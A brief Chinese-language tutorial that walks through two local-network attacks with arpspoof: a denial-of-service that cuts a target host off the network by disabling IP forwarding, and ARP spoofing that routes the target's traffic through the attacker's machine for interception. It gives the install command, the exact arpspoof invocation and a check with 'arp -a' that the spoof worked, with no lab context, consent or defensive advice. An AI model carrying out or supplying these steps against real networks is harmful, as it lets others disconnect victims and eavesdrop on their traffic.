一、局域网断网攻击
1.准备工作
使用工具:arpspoof
安装:sudo apt-get install dsniff
2.修改ip_forward
/proc/sys/net/ipv4/ip_forward 如果为0表示不转发,则会断网。后面讲到的arp欺骗,则需要设置为1,表示会转发,则不会断网,但数据包会经过攻击者主机。
修改值 echo 0 >/proc/sys/net/ipv4/ip_forward
3.操作命令
命令:arpspoof -i wlan0 -t 目标ip 网关ip
二、arp欺骗
1.与局域网断网类似,工具仍然使用arpspoof,不过ip_forward的值要修改为1,操作命令也一样
2.验证
在目标主机上打开cmd,输入arp -a,回车后可以发现,网关ip与攻击者主机的ip相同,成功实现了arp欺骗。